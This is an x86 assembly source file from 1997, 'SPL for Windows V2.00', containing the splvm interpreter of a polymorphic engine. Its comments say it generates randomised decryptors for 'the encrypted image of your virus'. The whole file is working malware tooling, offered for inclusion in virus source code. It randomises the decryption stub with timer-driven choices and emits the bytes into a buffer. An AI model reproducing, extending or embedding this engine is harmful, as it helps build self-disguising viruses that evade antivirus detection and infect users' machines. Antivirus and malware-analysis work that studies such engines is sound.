;   SPL for Windows V2.00
;   (c)1997 by ANAX	   
;
;   Description	:
;    This file contain the <splvm> routine. 
;   Copy this function to your source file or put the command:
;   "INCLUDE splVM.inc" in your source file.   
; ------------------------------------------------------------


;;Registers
;;BP=instraction size
;;AL=current instruction
;;AH=Return value 
;;SI=pointer to the current SPL instruction
;;CX,DX=The math qeue. CX is Math qeue 1, DX is Math qeue 2   
;;
;;
;;Variables
;;0000 SPL BUFFER POINTER
;;0002 Math qeue 3 
;;0004 Math qeue 4
;;0006 Math qeue 5
;;0008 randvar
;------------------------------------------------------
;Fuction name:<sple> 
;Description: The SPL Engine. 
;Input: 
;DX:SI  = segment and offset of your engine's data. That's
;         the data table created by the SPL compiler.        
;ES:0000= Segment adress of a reserved memory block.     
;    	  This memory block, must first be initialized 
;         with <splrand> fuction. 
;DS:0000= Segment adress of the second memory block. 
;         Its the buffer where your SPL program will put 
;         the decryptor and possible you would also like 
;         to put there the encrypted image of your virus.
;         So, the size of this buffer depents on you.
;Output:
;         Registers and Flags are not effected.
;         DS:0000-???? buffer will contain the generated decryptor.
;         ES:0000-0511 will contain the variables.
;         the rest ES:512-???? will contain garbage. 
;------------------------------------------------------
splvm    PROC NEAR   

;Save registers AX,BX,CX,DX,SI,DI 
;( 7 bytes long ) 
	        PUSHF 
	        PUSH AX 
	        PUSH BX 
	        PUSH CX 
	        PUSH DX 
	        PUSH SI 
	        PUSH DI 

;decompress data table from DX:SI to DS:0200h   
;( 50 bytes long )
	        PUSH DS  
        	PUSH DX  
        	POP DS  
		Lodsw
		mov cx,ax  
        	MOV DI,512 
        	MOV DL,DS:[SI] 
        	INC SI   
		cld
spldecompress0:	Lodsw 
		cmp al,dl
		jz spldecompress1
		dec si
spldecompress2:	stosb
		loop spldecompress0
		jmp spldecompress4
spldecompress1: cmp ah,0
                jz spldecompress2 
		mov bx,di
		sub bx,ds:[si]
		add si,2
spldecompress3:	MOV AL,ES:[bx]    
        	INC bx    
        	MOV ES:[DI],AL    
        	INC DI    
		dec ah 
                jnz spldecompress3
		loop spldecompress0  
spldecompress4:	POP DS    
        	    
		PUSH DS  ;exchge DS,ES
		Push ES
		POP  DS
		POP  ES

;initialize registers and call the interpreter 
	        MOV SI,512
	        MOV WORD PTR DS:[0],0 ; IP=0 STARTING VALUE
	        CALL spltranslateinstr 

		PUSH DS  ;exchge DS,ES
		Push ES
		POP  DS
		POP  ES

;Restore AX,BX,CX,DX,SI.DI 
	        POP DI 
	        POP SI 
	        POP DX 
	        POP CX 
	        POP BX 
	        POP AX 
	        POPF 
	        RET  ;exit   

spltranslateinstr: 
		PUSH SI
                IN AL,40
                MOV AH,AL
                IN AL,40
                MOV DS:[0008],AX
		XOR AH,AH        	               
		MOV AL,DS:[SI] 
               
;decode instruction "ALL"
splall:		
	 	CMP AL,252  ;VI_All
                JNZ splshift  
                INC SI 
splall1:	MOV AL,[SI]
                CMP AL,235  ;VI_End   
                JnZ  splall2
		pop si
		push si
                jmp splnopping
splall2:     	call spltranslateinstr 		
		TEST AH,AH 
                JZ splall2
        	CALL splgetinstrsize 
        	ADD SI,BP 
        	JMP splall1 


;decode instruction "SHIFT"
splshift:
		
	   	CMP AL,254  ;VI_SHIFT 
                JNZ splselect  
		INC SI  
splshift1:      MOV AL,DS:[SI] 
		CMP AL,236 ; VI_Noop
        	JZ splshift3 
        	CMP AL,251 ;VI_NoopM
        	JZ splshift3 
                CMP AL,235  ;VI_End
                JNZ splshift2
		pop si
		push si	
		jmp splnopping
splshift2:	call spltranslateinstr 
		xor ah,ah
        	POP SI   
	        RET    
splshift3:	CALL splgetinstrsize 
	        ADD SI,BP 
	        JMP splshift1 


;//////////////
;decode instruction "SELECT"
splselect:      
spl5select:	CMP AL,255 ;VI_SELECT
        	JNZ splrandom  
splselectagain:	mov DI,ds:[si+1] 
		and di,00ffh
		ADD DI,DI
		MOV AL,DS:[DI]	         		
splselectagain2:POP si 
        	PUSH SI
        	ADD SI,2
        	XOR BL,BL 
splselectnext: 	cmp byte ptr ds:[SI],235 ;VI_End 
        	jz splselectdiv 
        	cmp byte ptr ds:[SI],251 ;VI_NoopM
        	jz splselectpass 
        	CMP AL,BL  
        	JZ splselectexec 
        	INC BL 
splselectpass:	push ax
		call splgetinstrsize 
        	add SI,BP
		pop ax         	 
        	JMP splselectnext 
splselectdiv:	TEST BL,BL 
        	JnZ splselectdiv2        
		pop si
		push si
		jmp splnopping
splselectdiv2:  XOR AH,AH 
		DIV BL  
        	MOV AL,AH 
        	JMP splselectagain2 
splselectexec:	call spltranslateinstr 
		test ah,ah
		jz splselectexit 
		pop si
		push si
		jmp splnopping
splselectexit:  pop si
		ret
;//////////////




;decode instruction "RANDOM"
splrandom:      
spl5:		CMP AL,253 ;VI_RANDOM
        	JNZ spl6  
		
spl5again:	IN AL,40h 
spl5again2:	POP si 
        	PUSH SI
        	ADD SI,1
        	XOR Bx,Bx 
spl5next: 
        	cmp byte ptr ds:[SI],235 ;VI_End 
        	jz spl5div 
        	cmp byte ptr ds:[SI],251 ;VI_NoopM
        	jz spl5pass 
        	cmp byte ptr ds:[SI],236 ;VI_Noop
        	jz spl5pass 
        	CMP AL,BL  
        	JZ spl5exec 
        	INC BL 
spl5pass:	push ax
		call splgetinstrsize 
        	add SI,BP
		pop ax         	 
        	JMP spl5next 
spl5div:	TEST BL,BL 
        	JnZ spl5div2        
		pop si
		push si
		jmp splnopping
spl5div2:      	XOR AH,AH 
		DIV BL  
        	MOV AL,AH 
        	JMP spl5again2 
spl5exec:	call spltranslateinstr 
		xor ax,ax
		pop si
		ret 


;decode instruction "NOOP"
spl6:   	CMP AL,251 ;VI_NoopM
        	JNZ spl7  
		jmp splnopping

        	
;decode instruction "NOOP"
spl7:   	CMP AL,236 ;VI_Noop
        	JNZ spl8          	
		jmp splnopping


;decode instruction "END"
spl8:   	CMP AL,235 ;VI_End 
        	JNZ spl9  
        	
		POP SI 
        	POP SI 
    		POP SI
		POP SI 
        	PUSH SI 
        	ret 

;decode instruction "VI_PopVariable"
spl9:   	CMP AL,247
        	JNZ spl11  
		MOV DI,DS:[SI+1]
	        AND DI,00FFh
		ADD DI,DI 		        	
        	MOV DS:[DI],CX    
        	JMP popqeue



;decode instruction "ADD"
spl11:		CMP AL,244 ;VI_Add
        	JNZ spl13  
		ADD DX,CX
		jmp popqeue        
        

;decode instruction "SUB"
spl13:  	CMP AL,243 ;VI_Sub
        	JNZ spl15  
		SUB DX,CX
		jmp popqeue


;decode instruction "XOR"
spl15:  	CMP AL,241 ;VI_XOR
        	JNZ spl16  
		XOR DX,CX
        	JMP  popqeue    

;decode instruction "PopEmit"
spl16:  	CMP AL,237 ;VI_PopEmit
        	JNZ spl17  
		MOV DI,DS:[0] 
        	MOV ES:[DI],CL 
        	INC WORD PTR DS:[0] 
        	JMP  popqeue    

;decode instruction "AND"
spl17:  	CMP AL,242 ;VI_And
        	JNZ spl18  
		AND DX,CX
        	JMP  popqeue   

;decode instruction "OR"
spl18:          CMP AL,240 ;VI_Or
                JNZ spl19  
		OR DX,CX
        	JMP  popqeue 

;decode instruction "Shift left"
spl19:          CMP AL,239 ;VI_ShiftL
        	JNZ spl20  
		SHL DX,CL
        	JMP  popqeue 

;decode instruction "Shift right"
spl20:  	CMP AL,238 ;VI_ShiftR
                JNZ spl21  
		SHR DX,CL		
        	JMP  popqeue


;decode instruction "Push ValueW"
spl21:  	CMP AL,250 ;VI_PushValueW
        	JNZ spl22
        	xchg DX,ds:[0002]  ;shift the math queue
		xchg DX,ds:[0004]
                mov DX,ds:[0006]
		mov dx,cx
		MOV CX,DS:[SI+1] ;get the value
		JMP splnopping

;decode instruction "Push variable"
spl22:  	CMP AL,248 ;VI_PushVariable
        	JNZ spl23
		MOV DI,DS:[SI+1]
	        AND DI,00FFh
		ADD DI,DI 		
        	xchg DX,ds:[0002]  ;shift the math queue
		xchg DX,ds:[0004]
                mov DX,ds:[0006]
		mov dx,cx
		MOV CX,DS:[DI] 
		JMP splnopping


;Pop 1 item from Math qeue 
popqeue:	MOV CX,DX
                MOV DX,DS:[2]
                PUSH DX
		MOV DX,DS:[4]
		MOV DS:[2],DX
		MOV DX,DS:[6]
		MOV DS:[4],DX
		POP DX
		JMP splnopping


;decode instruction "EMIT variable"
spl23:  	CMP AL,246   ;VI_EmitVariable
        	JNZ spl24  
        	MOV DI,DS:[SI+1]  
		AND DI,00FFh
		ADD DI,DI
		MOV AL,DS:[DI]
        	JMP spl25 

spl24:  	CMP AL,245 ;VI_EmitValueB
        	JNZ spl25  
        	MOV AL,DS:[SI+1]  

spl25:  	MOV DI,DS:[0] 
        	MOV ES:[DI],AL 
        	INC WORD PTR DS:[0] 
        	JMP splnopping 




splnopping: 
        CALL splgetinstrsize 
        MOV AH,0FFh
        DEC BP
        JZ splonenop 
        MOV byte PTR DS:[SI],251  ;VI_NoopM 
        MOV BYTE PTR DS:[SI+BP],235  ;VI_End
        JMP splreturn 
splonenop: 
        MOV BYTE PTR DS:[SI],236  ;VI_Noop

splreturn:
splreturning: 
	        POP SI 
	        RET 



;BP= returns the size of instruction on DS:[SI]         

splgetinstrsize:  xor di,di
		  xor bp,bp	
splgetinstrsize4: mov al,DS:[si+bp]
		  inc bp
		  CMP AL,251		
		  JB splgetinstrsize2
		  cmp al,255
		  jnz splgetinstrsize3
		  inc bp
splgetinstrsize3: inc di
splgetinstrsize6: call splgetinstrsize4		  
		  cmp di,0
		  jnz splgetinstrsize6		
		  ret

splgetinstrsize2: cmp al,235
		  jnz splgetinstrsize5
		  dec di
splgetinstrsize5: 
		  cmp al,245
		  jb splgetinstrsize1
		  inc bp
		  cmp al,250
		  jb splgetinstrsize1
		  inc bp
splgetinstrsize1: ret


splvm   ENDP   
;------------------------------------------------------

